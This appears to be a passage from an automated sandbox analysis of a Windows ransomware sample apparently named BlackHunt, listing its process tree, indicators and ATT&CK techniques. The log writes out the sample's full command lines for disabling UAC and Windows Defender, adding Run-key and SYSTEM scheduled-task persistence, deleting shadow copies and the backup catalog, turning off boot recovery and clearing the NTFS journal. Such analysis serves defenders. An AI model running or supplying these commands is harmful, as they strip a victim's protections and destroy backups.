cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 57 PID 2380 wrote to memory of 2108 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 57 PID 2380 wrote to memory of 2108 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 57 PID 2380 wrote to memory of 752 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 59 PID 2380 wrote to memory of 752 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 59 PID 2380 wrote to memory of 752 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 59 PID 2380 wrote to memory of 752 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 59 PID 2380 wrote to memory of 584 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 61 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe"C:\Users\Admin\AppData\Local\Temp\cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2380 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:3040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2552
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:1348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2236
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2536
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2288
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2108
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:752
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:692
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1156
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2352
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1616
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1084
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe" /F2⤵PID:1068
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe" /F3⤵
- Creates scheduled task(s)
PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2396
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2600
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
- Modifies registry class
PID:1348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3060
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2440
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:512
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2800
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2012
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1884
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:552
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:632
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2704
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1192
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2836
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD571beb2929edbae5798d23700b71f6dbe
SHA152104a7014ec05614d73bd9e54b1e1b32dace911
SHA2567f56ad0892a73758d3fde71aee71d8567ca702f990b7f9b01174b77f68baafcc
SHA5120981e67f6f20ba23a9ad6ceb43694dc062d6c5f2882fe20783431feb3a0dbc92e5b1ef2bb90d0ca245a66de0bfb0e83a6b9ed9e757014a0a3cffd5343e161a52
-
Filesize
12KB
MD503f41eaf93d3b63e24405c273f9bce96
SHA161c7524dac3425404d8c89b09992887567f740a8
SHA256ca1a60ae023c69d5603758e3334499693320bfb6dc7058d6db624f8cd3fb4437
SHA5120c7ee8b88bb3a309d16729349e355ebe78dbd54ebfd3a00a60f876755bf49145e815eaa25b35f44d81ec6c556b8b907eb771171b5f6f83e6b91148430e5e339c
-
Filesize
684B
MD509a44682788ac0df7a51eb1434f0e24d
SHA142298dd9b3d4bb829d2fcaeea7df513db0909ec0
SHA25627d2b822831271663a82619feb462c1c583f734db5c0171e4559e33834833057
SHA512799b3ea7ce94d96395dfc151a42b6a2b7dc0669f4b77271ced7eb21f73727bee22ac6ecb0cbfeeb34f7af7491724e53fea25341f7021f75546d1d3a55e3def98